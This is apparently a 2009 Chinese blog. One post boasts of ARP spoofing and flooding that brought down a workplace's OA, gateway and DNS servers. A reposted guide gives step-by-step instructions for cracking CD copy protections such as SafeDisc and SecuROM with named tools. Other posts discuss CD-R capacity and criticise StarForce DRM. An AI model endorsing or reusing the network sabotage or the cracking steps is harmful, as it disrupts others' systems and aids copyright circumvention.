Wednesday, June 10, 2009

网管的先人在桑干河上啊

我们的网络是三级交换网络.而我则处于这个金字塔的底端,也就上经常遭受蹂躏的一拨.
其实对付本段内部的其他机器的欺骗及攻击那是很好解决的,可以过滤一切他们的机器信息.
郁闷就郁闷在我们这里的网管纯粹就是一个变态色情加流氓的角色.
网络大概情况是:
网关为一台在硬件路由之前工作(带过滤,各三级交换机上层一个独立网关),wins服务器及dns服务器为一台(在硬件路由[公网IP]之后工作,也具备路由功能也有公网IP),后面是2层过滤监控环境然后统一路由出去
色情就色情在没事就监控美丽少妇(各种丈夫常年在项目上不回家的),乃至连我们这些大光棍男子的电脑数据也被他们将衣服剥了一层又一层.简直就是裸奔.
流氓就流氓在浪费几十各公网IP自己在外面搞私活而公司主页,OA系统都从外面买
变态就变态在除了掌握我们的帐号信息,访问信息及各种隐私外.还没事就调戏我们:你正查某个站点,中途就给你掐断一下,然后象死了一样.或者你明明用的好好的,突然就给你直接封个几分钟,更无耻的就是大部分他不用还不想让别人用的直接就封死了.
前期的战争是他用网关机器直接对我们ARP欺骗,这种欺骗简直就是无耻,国内好多软件根本就不能抵抗这种来自真实网关的arp欺骗与攻击,我用国外的一款软件彻底抵御了.分公司网关就给我个电话说我机器有病毒攻击服务器(RTM,这个也叫攻击服务器?),接完电话不到3分钟直接将我的IP和对应MAC在白名单中删除,我是在wins服务器那里就给抹杀了,彻底上不了啦.
为了那可爱的网络我就colone了(要开IP要报告,领导审批,然后不知道是哪个内心阴暗如同我们的领导一阵臆想与审查),colone之后当然同分公司不同部门还有各自的交换机,端口转发的设置还不完善,当然就抢信号了.直接挤掉领导电脑,这个时候OA上发布一个批处理程序美其名曰:这个病毒能IP冲突,arp攻击.这个程序就专门解决这个.我看下代码我的个神哦.居然是将nslookup程序给改成同名文件夹(RT,到这里我终于明白杀毒软件原来是用来破坏系统文件的).
这样也能上,不过感觉跟小人玩这种游戏没有乐趣,让他给我开ip就ok 了.所以我来了几次arp的ddos基本上3分钟解决oa服务器,网关,dns服务器(跨网arp也是可操作的).几千人的网络上不去网,无耻网管组多人与我对轰,我靠居然被我轰倒几台机器(包括虚拟机,我真不会专业ddos).如此3天直接将我们交换机主线给拔了,我们这里没有大领导日了.忍受半月不上网.可能有其他领导干涉吧,终于是开了现在.(期间还派人到这里美其名曰查病毒,就是自圆自己的病毒谎言,难道不知道这个是他们自己无耻的结果?只有这帮煞笔领导还听着他们忽悠).
结果是现在直接退到DNS后面的过滤层监控,我时常打出www.jiankongnimabi.com然后我网络就被断掉好几分钟.
arp对轰终已我这个金字塔底部的人妥协告终,而无耻如他们则升级了他们无耻的方式.第三人攻击在继续,对于网络结构我无能为力,那位是第三人的高手希望指点一二!
title 转一个:

Sunday, June 7, 2009

他们都在离开

要走的终究要走,哥几个都走了.每个人都有自己的想法与追求.我现在不想太多,不要这个也想,那个也要,学就一门心思研究到透彻.也不做再回校园的奢望.人生其实很短.当自己一直徘徊蹉跎的时候时光就象憋不住的屁一样转眼就又没了.话不多说.博客IP被封了,这里只写不看了.

Tuesday, May 12, 2009

网络第一美女黑客真伪?

没有联系她的QQ:709193296
只是看了看照片,觉得没有计算机高手的气质,所以第一眼是不相信
继续翻她的作品,应该说技术最高的是个vmprotect的破解版,可惜在unpack.cn看到这个是nooby的杰作,还有人谐戏的说"nooby以后别偷人家的东西",nooby更搞:"等1.8,我用他名字放.让作者找他麻烦"
我到现在就知道黑页排行榜上有个寒水芊芊妹妹是真的.和早年的月色莺子等人
现在真TMD世风日下

光盘加密解密技术[转]

各种光盘加密技术与防拷破解方法详解

各种光盘加密技术与防拷破解方法详解01
1、Cactus Data Shield:音乐CD保护技术,目前有CDS-100、CDS-200、CDS-300三个版本。
保护机制:常见的音乐CD保护技术,在光盘中加入了电子自动记录扇区以干扰CD-ROM在复制过程中的操作。

2、CD-Cops:数据光盘保护技术。
保护机制:在安装程序外加保护套,安装时验证密码(通常为8位)。
光盘特性:在安装目录有CDCOPS.DLL文件。

3、DiscGuard:数据光盘保护技术。
保护机制:光盘上的执行文件被加密,CD-ROM压片时被加入数字签名并且被映射到软件的序列号中,软件执行时将序列号与数字签名进行对照。
光盘特性:安装目录有IOSLINK.VXD和IOSLINK.SYS文件。

4、Dummy files:数据光盘保护技术。
保护机制:修改ISO与文件大小相关的代码创建超大的假文件,使光盘总容量显示为最大2GB,造成常见的650MB、700MB的CDR无法备份的假象。
光盘特性:显示光盘中有超大文件(700MB-2GB)。

5、SafeDisc:数据光盘保护技术,根据保护机制不同通常分为1.0、2.0-2.4、2.51以上三个版本。
保护机制:2.4之前的Safedisc保护光盘在压片时嵌入数字签名,早期的刻录机无法备份数字签名。2.51以后的Safedisc则采用了weak sector technology(弱扇区技术)。
光盘特性:光盘中有00000000.016、00000000.256、00000001.tmp等文件。

6、SecuROM(new):数据光盘保护技术。
保护机制:光盘压片时加入SecuROM电子指纹,程序运行时,光盘中的验证程序检验SecuROM电子指纹。
光盘特性:光盘上有CMS16.DLL、CMS_95.DLL、CMS_NT.DLL等文件。

7、TAGES:最新的数据光盘保护技术。
保护机制及光盘特性:不详。

8、Star Force:最新的数据光盘保护技术。
保护机制:原理类似于CD-Cops,但进行了改进。
光盘特性:不详





各种光盘加密技术与防拷破解方法详解02
各类防拷破解方法&光盘教学(完整版+烧录全搜集)
1.Safedisk
方法1:使用 unsafedisk
步骤:
(1)先建立资料夹,将光盘内所有文件copy到硬盘
(2)执行unsafedisk.exe,按Decrypt Game
(3)找寻资料夹中有关*.exe/*.icd/dplayerx.dll的文件,一一尝试
(4)等一段时间,会产生两个文件
(5)将游戏安装,把产生两个档copy安装目录,分别试试哪一个可以正常执行游戏
(6)可正常执行游戏的为破解档
(7)将copy到硬盘光盘资料烧到光盘,并将破解档一起烧入
(或覆盖原本光盘内执行档),记得光盘标签要和原光盘一样

方法2:使用C.u.dilla 官方网站:不知
步骤:类似,就不多说
方法3:Generic Safedisc Emulator 官方网站:http://come.to/SwENSkE
步骤:
(1)使用备份光盘安装
(2)执行safedisk.exe,找寻游戏执行档执行
(3)开始游戏
//以上破解方法可能无法用于较新的SD保护

2.Safedisk2
方法1:使用PlayBack21
操作系统:95/98/ME
步骤:
(1)先用CloneCD将光盘片读成影像档
(2)执行playback中的patchimage,读取影像档,按 "Crtl+S"来patch影像档
(3)用CloneCD将patch过的影像档烧回光盘
(4)执行playback中install,然后重开机,在右下角会新增一个笑脸
(5)用右键点选笑脸,开启playback,再将备份片安装,就可玩游戏
方法2:使用INSEKTORS1.1 官方网站:http://go.to/insektors
操作系统:95,98,98SE,Me,2000,XP
步骤:
(1)安装程式后,点选 installtion/cheack,按install/update driver,然后重开机
(2)用blindread作影像档,执行INSEKTORS,按CD Image Patch
(支援bwi.img.bin.nrg.iso等,但作者建议使用bwi)
(3)选取影像档位置,按Prepare,完成后,再把影像档烧回光盘
(4)安装游戏,然后执行INSEKTORS,按CD Driver cfontrol & Status
(5)勾选Play Insektors CD(或按check all),然后执行游戏
方法3:使用BetaBlocker 网站:http://www.geocities.com/cdbeta
步骤:
(1)先用CloneCD将光盘片作成影像档,执行BetaBlocker
(2)将作好的影像档拖曳到BetaBlocker中
(3)将Max Sector设到最大值,按Scan Sectors,再按Patch Sectors
(4)将破解后的影像档烧到光盘
方法4:使用unsafedisk2 官方网站:不知
操作系统:98se,应该也能于95/nt/2k/me执行
步骤:
(1)将光盘片copy到硬盘,执行*dumper.exe找寻保护档(也就是执行档)
和需要的dll档,产生*.data.bin
(2)执行*Rebuilder.EXE,选择产生的*.data.bin,会在产生一个档
(3)将产生的档名改成最初dumper的档名,覆盖原档
(4)将游戏烧回光盘,破解完成
//以上破解方法可能无法用于较新的SD2保护

3.Securom
方法1:使用前导程式Generic SecuROM Crack v6.0 官方网站:http://www.zor.org/laxity
步骤:
(1)执行前导程式,不要关闭
(2)安装并执行游戏就可
方法2:使用PlayBack21 官方网站:不知
操作系统:95/98/ME
步骤:
(1)执行playback中install,然后重开机,在右下角会新增一个笑脸
(2)用右键点选笑脸,开启playback,再将备份片安装,就可玩游戏
方法3:使用INSEKTORS1.1 官方网站:http://go.to/insektors
操作系统:95,98,98SE,Me,2000,XP
步骤:
(1)安装程式后,点选 installtion/cheack,按install/update driver,然后重开机
(2)安装游戏,然后执行INSEKTORS,按CD Driver cfontrol & Status
(3)按check all,然后执行游戏
方法4:使用Unsecurom 1.0 官方网站:http://welcome.to/karpoffhttp://wkt.tsx.org
步骤:
(1)安装游戏(要完整备份片或原版片),不要将光盘拿出,执行Unsecurom
(2)按files->open,找寻安装游戏的执行档(安装于硬盘),在按securom->dump/Rebuild
(3)等候一段时间,以后就可以用nero或cdrwin等的备份片来玩游戏
//以上破解方法可能无法用于较新的Securom保护

4.New Securom(Securom2)
方法1:使用Playback21 官方网站:不知
操作系统:95/98/ME
步骤:
(1)执行playback中install,然后重开机,在右下角会新增一个笑脸
(2)用右键点选笑脸,开启playback,再将备份片安装,就可玩游戏
方法2:使用INSEKTORS1.1 官方网站:不知
操作系统:95,98,98SE,Me,2000,XP
步骤:
(1)安装程式后,点选 installtion/cheack,按install/update driver,然后重开机
(2)安装游戏,然后执行INSEKTORS,按CD Driver cfontrol & Status
(3)按check all,然后执行游戏
//以上破解方法可能无法用于较新的Securom2保护

5.LaserLock
方法1:使用LL32ICA 官方网站:http://www.icagrp.comhttp://www.ica.><.net
操作系统:Windows 9x/NT/2000
步骤:
(1)将文件复制到硬盘
(2)执行LL32ICA.exe,按Load it!,选择保护的执行档
(3)patch完成后,将资料烧回光盘(标签名称需和原光盘相同)
可能遇到的问题:
1. Your Application isn't Protected By LaserLock!'
(不是LaserLock保护)
2. Your Application isn't 32-bit.
(应用程式不是32位元)
3. Your Application isn't Protected By Injection Method of LaserLock.
(程式不是LaserLock注射模式保护)
4. Your Application is Protected By an Unknown Version of LaserLock.
(保护版本不明)
5. You didn't Select Main LaserLock Protected EXE File to Patch.
(没有选择主要的保护exe去patch)
//以上破解方法可能无法用于较新的LaserLock保护

6.CD-Cops
方法1:使用mcLallo's CD-Cops 32 Decrypterv1.0 官方网站:不知
操作系统:Windows 9x
步骤:
(1)执行程式,按 'open File'
(2)到有CD-Cops保护的程式光盘,选择'.W_X'(先将光盘copy硬盘)
(3)开始计算从255到0(有时程式会停在中间找到key,或全部跳过key
或选择一个key.会两种模式会依照文件的加密模式来解密,不过两
种模式都是可行的)
(4)如果没有错误,选'Save File'储存.exe,然后以下文件就不需要了
the old .EXE
CDCOPS.DLL
*.W_X
*.QZ_
(5)重烧一次就可,标签名称要和原光盘相同
//破解版本仅限于CD-Cops 1.6版之前
//最新CD-Cops 32 Decrypterv2.1版推出,支援CD-Cops 1.6版,破解方法类似
请看其中之说明档
7.SafeAduio
方法1:在捉音轨程式中选Burst Copy Mode(建议用烧录机捉或具硬体跳音更正)
操作系统:视程式而定
方法2:使用修改版CDFS.vxd
操作系统:windows 9x,不能用于Windows NT/2K/XP
步骤:
(1)将C:\WindowsSystem\IOSubSys\CDFS.vxd改名,将修改版的CDFS.vxd
复制到资料夹中
(2)重开机,将音乐CD放入光盘机中,用文件总管开启光盘机,就可将音轨当作
WAV档复制到硬盘

8.CopyLok/PanLok
方法1:使用CopyLok/PanLok remover 1.0 官方网站:不知
操作系统:Windows 9x/NT(NT下可能部份游戏有问题)
步骤:
(1)执行CopyLok/PanLok remover 1.0
(2)执行保护的游戏
(3)等待讯息框出现
(4)到windows/system下找到CL-DUMP.exe,copy到游戏安装目录,
用此文件来进行游戏就可

9.一般CD检查保护
方法1:使用 UN-CDCHECK 1.0 官方网站:http://www.thrawn.da.ru
(1)将游戏安装
(2)执行程式,点选 EXE? 选择游戏执行档(Backup EXE记得打勾)
(3)按 Search 完成破解,如果破解失败,请将备份档还原
约可破解50~60%的一般CD检查保护





各种颜色的光盘用途03
1、WATER BLUE(水蓝色)
用最新的防DATA LOST技术,大大减少BufferUnder Run的情况,
所以在一对一及一对多的1x-12x烧录模式中拥有超强的稳定性。
最佳烧录格式为:数据(DATA)

2、OMEGA BLACK(黑色)
纯黑的材质,能防止光线损坏当中的有机染料,
大大延长CD-R的寿命,保存更长时间。
最佳烧录格式为:游戏(GAMES、DATA、MP3、PS2)

3、PURPLE(紫色)
能防止光线损坏当中的有机染料,大大延长CD-R的寿命,
保存更长时间。最佳烧录格式为:游戏(GAMES、DATA、PS2)

4、APPLE GREEN(苹果绿色)
当中的有机染料对微弱讯号极为敏感,能令烧录的音乐音域表露无遗,
可以说是特别为数码音乐而设。
最佳烧录格式为:歌曲(DIGITAL AUDIO、MUSIC CD、DATA)

5、METALATE RED(金属红色)
能令雷射光完全穿过,使CD-R接收讯号完美无暇。
最佳烧录格式为:音乐(MUSIC、CD、DATA)

6、COPPER MINE(矿黄色)
能令雷射光完全穿过,使CD-R接收讯号完美无暇。
最佳烧录格式为:音乐(MUSIC、CD、DATA)

7、ORANGE(橙色)
能令雷射光完全穿过,使CD-R接收讯号完美无暇。
最佳烧录格式为:音乐(MUSIC、CD、DATA、VCD)

8、DIAMOND(纯银色)
其烧录面颜色与普通VCD无异,当中的"串音频率"特别低,
可令文件读取时的线条或马赛克出现减至最低。
最佳烧录格式为:视频文件(VCD、MPEG、FILE)

给新手参考的简单观念。我们常见74分钟的光盘片有650M、680M的两种标示。
这是怎么计算的呢?

1.首先说明,光盘片容;资料的最小单位称为sector(磁区),磁区分主通道和子通道两部份。主通道是正常资料(文件、音轨..)储存
所在,大小是2352 bytes,计算光盘容量时,仅仅计算此部份;子通道子通道有P~W等八个,总计98位元组,则原本是摆放像音
乐光盘的歌手、曲名、公司等及一些其他用途。当光盘用于储存声音资料时,一个磁区的2352 bytes全部被用到。但用于储存档
案资料时,由于一个bit错误,就会造成严重后果,因此必需有侦错、改正错误的机制,一个磁区只有2048 bytes用于储存文件资
料,其他304 bytes用于存放根据编码理论得出EDC/ECC码(Error Detection Codes/Error Correction Codes)。如此,当光盘记录声音
档时,是以一个磁区2352 bytes计算,而记录文件资料时是以2048 bytes计。

2.74分钟主要是指可以容?#123;74分钟的数位声音轨资料(*.wav)。数位声音是从类比声音记录(真实、连续的声音记录)取样而
来,目前公订的取样标准是两个声道,每声道,每秒取44100次样本,每一个样本的大小为16 bits(=2 bytes),此即wav档16 bits、
44.1Khz的声音取样规格。如此一分钟的音轨大小是 2*44100*2*60=10,584,000 bytes。记忆容量的单位一般是以Mega来算,1
Mega bytes=1 K bytes*1 K bytes。要注意的是 1K bytes应是2^10=1024 bytes,但有时会被以1000 bytes做计算(这样会显得光盘或硬
碟有较大的容量,这是一种取巧的商业行为)。瓠在我们先以1M=1024*1024 bytes=1,048,576 bytes计。则 一分钟的音轨大小是
10,584,000/1048576=10.0937M。所以74分钟的光盘是可以
容?#123;10.0937*74=746.933M的音轨资料。若是储存文件,则是746.933*2048/2352=650.3906M (若以1M=1,000,000 bytes计,则
是681.984M)。

3.总结一下,
74分钟:
音乐,746.993M (783.279M <--若 1M=1,000.000 bytes计)
文件,650.396M (681.984M <--若 1M=1,000,000 bytes计)

80分钟:
音乐,807.560M
文件,703.131M

90分钟:
音乐,908.505M
文件,791.022M

99分钟:
音乐,999.356M
文件,870.124M

120分钟:(尚在研发中)
音乐,1211.3M
文件,1054.7M
容量计算方面.....
个人是用较简单的计算方式.....

一个磁区以 2048 byte 计算 (Mode 1) (音讯则以 2352 做计算)
一秒中有 75 个 Sector (磁区)
一分钟有 60 秒
>>>
2048 x 75 x 60 = 9,216,000 byte (一分钟)
除以 1024 = 9000 KB
除以 1024 = 8.7890625 MB


74Min = 74 x 8.7890625 = 650.39062 MB (约)
80Min = 80 x 8.7890625 = 703.125 MB (s)
90Min = 90 x 8.7890625 = 791.01562 MB (约)
99Min = 99 x 8.7890625 = 870.11718 MB (约)

**PS**
以上内容乃敝人四处汇集整理,自认标题"原创"应该不算滥竽充数。
比起过度动辄胡乱下标属名"原创"混淆视听者两者有别之。

**PS2**
月前,整理修护硬盘坏道。使用过金海硕效率源磁盘坏道修复程式;
发现有种FDD保护机制实在很BT,FDD内容不可见,强制使用类似Norton Disk Doctor 修护;
结果FDD 修护正常可读写,但所有可运行文件EXE 都没了。
金海硕效率源保护机制,真是天下之大无奇不有。
有用过追追踪过它者,也可聊聊这稀奇的事务。
呵呵。

PS
一个声名狼藉的垃圾Star Force
深受其害被害者诸多也
下面引述两篇稍微介绍吧



StraForce它的防盗技术StarForce对电脑有什么危害!
StraForce是来自俄罗斯的软件防盗版技术。现在大多数国产游戏用的都是StarForce防盗。然而,
1.SF会安装在第0轨,也就是系统层(当年的CIH病毒是第一个这么干的),此后,除非格式化硬盘,不然SF无法移除干净。
2.SF会取得硬体资源最高控制权,无论是否在进行游戏,永远、随时的监控你的电脑。
3.SF会经常性读取光碟机,防止有人从该处动手脚,但这样拼命的后果就是,光碟机损坏率大幅提升。
4.SF会避过window安全机制,暗中置换USB、1394等系统档,且永远无法修復,即使在安全模式都无法改回原样,这种动作同等於病毒所為。
5.SF监视下,若发现虚拟、盗版相关,有时為防止其正常运作,会造成当机。
6.SF持续收集电脑内所有资料,若SF运作过程中发生错误,会将电脑完整资讯传回给SF公司,这资料的内容达3千7百多行,裡面包含私人资料。
7.美国已禁止使用该软体,且Ubisoft,无冬之夜2,银河文明2等都声明不再使用SF软体了。
8.银河文明2声明不使用后,在此游戏的开发公司官方讨论版上,遭到SF公司的攻击,甚至恶意散布盗版《银河文明2》的BT种子,使其知道盗版的利害。

以下引用游侠网某网友的帖子
QUOTE:
很遗憾的说:我的光驱被仙剑4带的StarForce5搞坏了。

非常遗憾。我的光驱是联想thinkpad T61 带的dvd刻录机。
玩仙剑4 一天的时间,坏掉了。 8月2日15点左右坏掉的,16点左右送联想兰快修理。
今天,也就是8月3日上午11点得到答复。  由于主观使用法律(美)所列定流氓插件StarForce,所以属于人为破坏,不予免费修理。
ps:说一声,我的电脑是在美国买的,在中国补税后添加兰快修理3年。
请大家珍重自己的光驱。我很喜欢这款游戏,但是StarForce的恶梦,让我掰碎了光盘。

真是见鬼!我在它的论坛上发问,结果被删帖!
突然感觉支持了10多年的仙剑,给我一种莫名的悲哀!

Starforce 是一个在国外被恨批的流氓工具,在美国还被法院判禁止使用,其加密驱动竟跟系统核心拥有相同权限。

一.Starforce 的驱动模式
业界知名的测试软件公司Futuremark 发现 Starforce 防拷软件有个不同寻常之处:它见到可疑之处便重启计算机——不管你当时在干嘛!
此软件会在系统里安装一个运行在最高优先级的驱动,可直接访问 PC 的驱程、进程、硬件层;无论你是否运行受保护的游戏,它都在高处警惕地注视着你的机器,一旦有可疑举动——比如拷贝受保护的光盘,它就会强迫计算机作毫无征兆的重启动。
而且,此防拷软件可以干扰 DPM (版权保护管理协议)的读取动作,任何依赖此协议的光盘一旦被放进受 Starforce 保护的光驱里就可能发生读取失败;更糟的是,Starforce 可能和某些特定型号的光驱不兼容,直接后果就是这些光驱的数据传输模式被更改成了老式的 PIO 模式,而不是原来效率最高的 DMA 模式。这样不单会影响电脑的运行速度,而且还会减慢硬件的数据传输速度。
如果有人不幸碰到上述情形,十有八九他会摸不着头脑,冥思苦想之余只能怪罪自己的硬件工作不稳定,或者当地电压不稳,或者自己RP不好……,绝对想不到是防拷软件在作怪。
那么,这么骠悍的软件出自谁人手笔?写软件的人自以为掌握了生杀予夺的大权?难道是当年 KGB 海外行动处的那帮人改行当了程序员?

二.Starforce 窃取个人隐私
Starforce 要求安装后重新启动,它要对你的计算机进行最高级别的控制,当然需要这样做。这是典型的流氓行径。
如果做了系统的 Ghost 光盘,事后格掉重做系统就行了,就当一切都没有发生过。不过,如果它窃取了你的个人信息,并传出去,就不是能轻易挽回的了。好像一个人在大街上被人扒光了衣服,春光外泄之后穿好衣物就能当没事一样么?
Starforce 在验证过程中硬盘狂转,看来读取了不少信息,来看看它都干了些什么。在报错后生成了信息文件,我把这个文件保存下来,这是个将要发送给流氓软件制造者的文件。真是不看不知道,一看吓一跳。这个文本文件竟有 288,214 字节,3467 行之多,详细记录了系统的全部信息。
文件首先记录了系统的详细信息,包括 Windows 序列号、安装位置、用户名称、常规设置信息等等。然后是硬件信息,包括所有的硬件设备的资源信息、运行状况、驱动的全部详细信息等等,网络信息,包扩 IP 地址、MAC 地址、全部使用协议资料等等,随后是硬盘的信息,包括所有分区的设置和使用状况、分区起始字节等等,接着是光驱和外设的全部信息,全部的驱动信息、动态链接库、所有进程的详细信息、所安装全部软件的信息.......总之,这些个人隐私,只有你想不到的,没有它不窃取的。不知道这个流氓软件有没有把我的资料外泄,还好,使用该光盘的时候我在断网状态,随后 Ghost 恢复了系统。
估计 Starforce 可以打着验证正版的幌子为自己辩护,但我很想知道,窃取用户的全部个人资料,就是为了验证光盘是否正版?我安装了哪些应用软件你也需要全部知道么?我安装了些什么游戏你也这么感兴趣?我的IP地址对验证光盘正版也有用?
流氓就是流氓,无论批什么外衣,本质都是流氓。

三.Starforce "捏造"正面言论
在 Starforce 近期与用户的"争端"中,出现了一个名位 OnlineSecurity ON 的安全信息网站,该网站不遗余力帮 Starforce 澄清此前有关防盗版系统危害计算机的"驱动"问题。
Starforce 人员"暗示"OnlineSecurity ON 为独立网站,和 Starforce 没有关系。
有趣的是,不久便有人透露,其实,该网站的 WHOIS(主机IP)地址和 STAR-FORCE.COM 一摸一样--195.90.131.214。不幸的是,现在看来,Starforce 方面似乎已经磨除了证据。
盗版可耻,如此防盗版,亦不为人所挂齿。





StarForce
StarForce 是 Protection Technology(星之盾科技)针对 Windows 平台设计的一款软体复制保护技术的商标,它最近获得了微软合作伙伴等级认证[1]并成为微软解决方案合作伙伴[2]和英特尔软体合作伙伴[3]。

它的主要保护方案是使用位元组码封装可执行文件和DLL,并通过其虚拟机解释这些文件。

尽管商标所有者 Protection Technology 声称 StarForce 很难被逆向工程所破解,但是通常使用该保护方案的游戏最终都会遭到破解。制作破解的难度与 StarForce 的版本及游戏开发者在可执行文件中应用的保护常式次数息息相关。


已知的保护策略
据认为,StarForce 是通过测量 CD 中第一个和最后一个写入扇区之间的物理角度来工作的。这个硬体特征在所有转自母盘的 CD 副本中都是唯一的,而以当前的技术,在刻录光碟时复制该特征是很困难的。一些程序可以通过截取 CD 驱动器与被保护程序之间的通讯来伪造这个角度,从而使保护措施形同虚设。

因为当前的大多数虚拟光碟机软体都是通过模拟 SCSI 驱动器来运作,故而若系统中安装了 IDE 驱动器,StarForce 4.0 之前的版本就会禁止使用 SCSI 光碟驱动器。但是,若系统中没有安装 IDE 光碟驱动器,StarForce 就会验证 SCSI 光碟驱动器中的光碟;它的弱点就是,即使系统中安装了 IDE 光碟驱动器,但若将其拔下或禁用,就可以通过一个虚拟的 CD 或 DVD 镜像来运行被保护程序。


StarForce 家族
《仙剑奇侠传三》StarForce 3光碟检测截图目前已知的官方 StarForce 产品包括:
StarForce Pro 3
在安装软体时需要输入一个"光碟序列号"。所有该游戏副本的序列号都是相同的,它用于将保护方案类型编码为母盘中所存在的类型;该光碟序列号与通常用于在线游戏的序列号不同,不要将两者相混淆。
StarForce Keyless[4]
StarForce 3.x PRO 新增的附加功能。因光碟序列号存储于光碟中,故无需再次输入。
StarForce 3.5[5]
增加了对 64 位系统的支持。被 StarForce 所保护的软体可以通过软体安装文件夹中的一个 .x64 文件而被 64 位 Windows 系统所识别。较早的版本会重新启动系统或直接拒绝在这类系统中运行被保护程序。
StarForce FrontLine 4.0[6]
完全支持 64 位应用程序。
完全支持 Windows Vista 32/64 位版本。[7]
第一个通过 WHQL 测试和"Microsoft Windows Vista 认证"的 StarForce 版本。
StarForce FrontLine 4.7[8]
似乎它仅仅是 4.0 的更新版本。没有其它可用的信息。
StarForce Frontline 5.0 [9]
提供了一个用于删除驱动的用户界面
允许对在线授权的应用程序进行解除激活及重新激活
FrontLine ProActive [10]
为网路分发之游戏和应用程序提供 DRM + 保护双重解决方案。光碟绑定被网路激活所代替。

Protection Technology 提供了驱动更新工具,但是它并非兼容所有被 StarForce 所保护的游戏。例如,要在 StarForce 支持 64 位前将 64 位支持添加到一个游戏构架中,开发者就需要专门为他们的产品开发一个补丁。


保护级别
现确认,有2种 StarForce 保护级别:
基本
"一款经济、简洁的解决方案,用于保护不需要使用产品码的廉价产品。它专为那些将软体分发于大众媒体或 Internet 的发行者及开发者而设计。它能够保护应用程序中的 Windows 可执行文件,在产品的生命周期内提供对产品的控制及许可证的分发。
专业
"一个提供了专业保护功能、有力抗击软体盗版的全方位解决方案。它专为那些将软体在线分发或分发于多种媒体的软体发行公司和开发公司而设计。专业版既确保了原始数据和原始码的稳定和安全,也能在软体产品的整个生命周期内提供对产品的控制和许可证的分发。
根据 Boycott StarForce Wiki 的资料显示,部分已知使用了"专业"级别保护的游戏有赌命战士、分裂细胞:混沌法则、极速房车赛、赛道狂飙:日出和超级战士等。它也引用了一个传闻中的保护级别"精英",目前尚不知有哪款已发布的游戏使用了该级别之技术。[11]


StarForce 3.0 的名声
尽管被 StarForce 3.0 所保护的游戏通常最终都会被破解,而且还有其他方法可以绕过其保护,然而 StarForce 3.0 还是因为极端难以被反向工程而得到了声誉。有些破解会在游戏官方发布后几天内放出,但也有一些游戏在官方发布后几个月或几年才被破解:例如分裂细胞:混沌法则,在官方发布后过了422天才被破解。[12]其他游戏需要手动对其破解,并且在完成这些步骤之后,还需要额外的破解来防止游戏崩溃,例如科林麦克雷 2005。[13]

分裂细胞:混沌法则的破解涉及了对 StarForce 3.0 的完全逆向工程,而且同破解一起发布的还有一组关于 StarForce 3.0 如何工作的文档。通过这些技术细节,StarForce 如何执行资源密集的过程(例如如何在模拟虚拟机函数和操作码的同时实现对光碟等媒体的检测等)也渐渐为人所知。[14]


驱动程序安装
StarForce 3.0 会将其自身的设备驱动程序在被保护产品第一次运行时安装或随被保护产品一起安装至系统,而该驱动程序通常并不会随软体一起被卸载(金刚是个例外),这一点令其饱受批评。尽管 Protection Technology 提供了删除工具,但其并未随被保护游戏告知或提供给用户。不过在安装科林麦克雷:泥土时,安装程序既会询问用户是否安装该驱动程序,还会提供一份附有如何卸载驱动程序等信息的帮助文件。

除以上所列,很少有游戏在安装前或安装时会告知用户 StarForce 驱动程序的存在。


精简/无驱动
StarForce 3.0 驱动通常与某些旧版本的游戏演示版、免费软体和像赛道狂飙:国家一样的下载版游戏一起安装。安装驱动的目的是防止破解者用演示版可执行文件帮助爆破最终版可执行文件(因为这两个文件通常极其相似),它也可以阻止网游作弊。为回应人们对安装驱动程序之行为的批评,Protection Technologies 发布了一种新的解决方案:StarForce 当前版本的精简版,它以游戏每3天要求插入源 CD 光碟代替了安装驱动程序。该精简版也用在了所有被 StarForce 所保护的演示版和下载版游戏中,以减少对光碟(或任何网路连接需求)的请求次数。


客户
CDV、育碧软体、Digital Jesters(现改组为 defunct)、JoWooD、Egosoft、Codemasters、Eagle Dynamics、MIdway Games以及Bohemia Interactive Studio 将 StarForce 3.0 用于他们的一些产品中。

不过,2006 年,育碧软体和 JoWooD 宣布,因为"StarForce 软体存在问题",它们在北美洲发行的游戏将不再使用 StarForce。[15]CDV 也于 2006年 5月宣布在今后所有的游戏中抛弃使用 StarForce 而改用 TAGES 复制保护系统,以回应用户的抱怨。[16]


社会反映
一些游戏者提议联合抵制使用 StarForce 的游戏或发行商。[17]这些游戏者声称 StarForce 软体会引起系统的不稳定甚至崩溃,而 Protection Technology 拒绝对其软体所造成的破坏道歉。育碧软体决定调查 StarForce 联合抵制的程度并在其论坛中发起一个投票,以调查谁在反对使用 StarForce。[18]结果(在一场诉讼[19]与网上的普遍不满[20][21]的同时),在魔法门之英雄无敌 V和 GTR2 中,StarForce 3.0 被 SecuROM 所替代。[22]


删除 StarForce 驱动程序
卸载一个被 StarForce 所保护的游戏并不会从系统中删除 StarForce 驱动程序,该驱动程序会继续在系统后台运行。StarForce SDK 为系统提供了卸载游戏时同时删除驱动程序的功能,然而它并不会被自动执行。当前已有一款可以从系统中删除 StarForce 驱动程序的官方工具。[23] 该程序存放在一个被 StarForce 官方网站中的连结所指向的第三方网站中。[24] 一些网友也提供了手动删除驱动程序的说明和方法。[25]

自 4.0 版本起,StarForce 开始包含一个删除服务。该服务会在被 StarForce 所保护的游戏被卸载之后自动卸载 StarForce 驱动程序。一旦卸载了驱动程序,该服务也会被自动删除。


争议
请注意,STARFORCE保护在美国是为违法手段,因其对系统带来的破坏及其非经格式化不可复原的破坏性。


软体
驱动程序安全
StarForce 3.0(2006 年 8 月前)带来了一个安全问题,具体表现为:当 StarForce 安装于一个可以在公共网路中被发现的受限用户帐户中时,驱动程序的访问控制列表会被设定为任何用户(包括没有管理员许可权的用户)都可以更改被驱动程序所运行的代码。这样入侵就很容易了:用户可以将该代码修改为指向任意可执行程序,它会在下次重新启动时以完全系统许可权运行。可以用安全工具"sercheck2"来检测是否存在这样潜在的不安全驱动程序配置。


公司行为
Boing Boing
2006年1月30日,著名的博客提供商 Boing Boing 引用一些与保护系统有关的问题,包括磁碟驱动器性能退化、作业系统安全性和稳定性的减弱,声称 StarForce 是恶意软体。[26]

在过了一天后的 2006年1月31日,Boing Boing 收到了 StarForce 的一封电子邮件,威胁采取法律行动,并称该文章"充满侮辱、谎言、错误的指控和传言"。[27]CNET 做了相似的事,并收到了相似的电子邮件。[28]不过,Protection Technologies 并未证实这些文章是恶意撰写的。

在争论中,知名的 Sysinternals 程式设计师 Mark Russinovich 分析了 StarForce 并发现其"没有什么明显的不稳定":[29]

" 我研究了一下 StarForce,除了一些监测 CD-ROM 流量和截取所有进程、执行绪信息的古怪方式之外,它的运行对系统没有什么明显的不稳定。
我发现寂静岭 III 的卸载程序并未卸载 StarForce,这是不能原谅的。但这是育碧软体的责任,而不是 StarForce 的。
"

Stardock
